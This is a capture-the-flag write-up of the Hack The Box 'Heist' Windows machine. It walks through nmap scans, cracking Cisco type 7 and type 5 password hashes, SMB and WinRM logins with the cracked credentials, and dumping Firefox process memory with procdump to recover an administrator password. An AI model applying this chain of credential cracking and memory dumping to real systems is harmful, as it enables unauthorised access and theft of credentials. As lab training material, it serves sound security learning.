# Heist (Easy) ## Enumeration ### Nmap ``` nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149 ``` ``` Nmap scan report for 10.10.10.149 Host is up (0.11s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-09T16:24:17 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds ``` ``` # Nmap 7.91 scan initiated Fri Jul 9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149 Nmap scan report for 10.10.10.149 Host is up, received user-set (0.090s latency). Scanned at 2021-07-09 12:47:57 EDT for 350s Not shown: 65530 filtered ports Reason: 65530 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc syn-ack Microsoft Windows RPC 445/tcp open microsoft-ds? syn-ack 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49669/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 20087/tcp): CLEAN (Timeout) | Check 2 (port 48515/tcp): CLEAN (Timeout) | Check 3 (port 25486/udp): CLEAN (Timeout) | Check 4 (port 40753/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-09T16:53:10 |_ start_date: N/A Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds ``` As usual, I will check port 80 and port 445 ### Port 80 ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5Ns0b2YpmMhrd05Tf%2Fimage.png?alt=media\&token=397ef684-f780-4bf0-99fa-5b684e95ee95) We can see a page like this and we are able to login as guest. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5P-X9EtPX7ZC0LvqU%2Fimage.png?alt=media\&token=ec75d527-d441-4da7-ac85-245de6d7d110) When we click the attachment shown at user Hazard, we can see this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5PCMuWveUl2l4dds7%2Fimage.png?alt=media\&token=9cd10f5d-9d08-4b0c-a84a-19529c234bb6) Upon researching, we know that type 7 password is crack-able. We can use this [website](https://packetlife.net/toolbox/type7/) to crack it. Meanwhile, for the type 5 password, we can use John-The-Ripper to crack it. | Hash | Password | | ---------------------------------- | ----------------- | | 02375012182C1A1D751618034F36415408 | Q4)sJu\Y8qz\*A3?d | | 0242114B0E143F015F5D1E161713 | $uperP\@ssword | | $1$pdQG$o8nrSzsGXeaduXrjlvKc91 | stealth1agent | After tons of trying, finally can login to SMB using the correct pair of credentials. ``` smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5NPmA8H_r9BQWiCla%2F-Mg5SI7Nf1XJ08MmznPy%2Fimage.png?alt=media\&token=c043ccba-7a0f-4a65-9158-90d6dbe29a2a) Then, I proceed to use **impacket-lookupsid** to find other possible users. ``` impacket-lookupsid hazard:stealth1agent@10.10.10.149 ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5SMFYSxj9SWL3eTVx%2F-Mg5SeUasK9dBdXcoV9O%2Fimage.png?alt=media\&token=7a59bfe2-740c-4c51-98d1-841bbf80e8a1) We can see there are user **Chase** and **Jason**. From the nmap full tcp scan, we know that port 5985 is for win-rm that can let us to login to the system. ## User We can use user **Chase** and the password **Q4)sJu\Y8qz\*A3?d** ``` evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d" ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5SMFYSxj9SWL3eTVx%2F-Mg5TKleRtZ6L-yW50yh%2Fimage.png?alt=media\&token=930bba26-777b-48ef-830d-26c7848f35b4) Got user flag ! ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5U7WMnFiIr_o9kIwW%2Fimage.png?alt=media\&token=898264d5-06ac-4bf1-a298-9d6eb61b872a) ## Privilege Escalation after some enumeration, we can see that Mozilla Firefox is installed in the machine. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5Uk4UeV2_QKTjjnVY%2Fimage.png?alt=media\&token=daa369c8-7e5b-452d-b7bb-40780cb48e73) From the ps command, we can see that there are few Firefox processes running. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5VZnH-4WrtzrD7K5b%2Fimage.png?alt=media\&token=af544af3-9e13-485a-b720-7f9fa13fd781) We can use [ProcDump64](https://api.256file.com/procdump64.exe/en-download-190118.html) to dump all the information inside the processes, then use [strings](https://ss64.com/nt/strings.html) to extract the information. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5Xb8W-oNctGHm82u7%2Fimage.png?alt=media\&token=5e7f7e0e-0373-47f2-b1cc-37a905687cec) ``` ./procdump64.exe -accepteula -ma 6728 ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5YNlt5r4jlQ2_0qZv%2Fimage.png?alt=media\&token=3f05b582-6aa1-4b2c-b2e6-72d2a26bab57) We can see there is a dump being created Now we can use strings.exe to pipe the readable input to a file. ``` ./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt ``` After that, we can download the file that we have readable strings. When I use sublime to search for the password, it shows this ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5ZTyAP-w8jJ_K1o0z%2Fimage.png?alt=media\&token=2e0aaa43-548c-4642-bd24-125a8fbddb71) Then, we can proceed to login as administrator using the password shown. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5_Us6A2GS7mv-eNqv%2Fimage.png?alt=media\&token=f07136d3-aae7-4275-8666-61a466b0451d) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5Te2YuYj-10RSfIkw%2F-Mg5_d4WAj9DtdL6W9qu%2Fimage.png?alt=media\&token=8aa7dc9e-8242-4647-b0f9-fce32f874574) Congratz !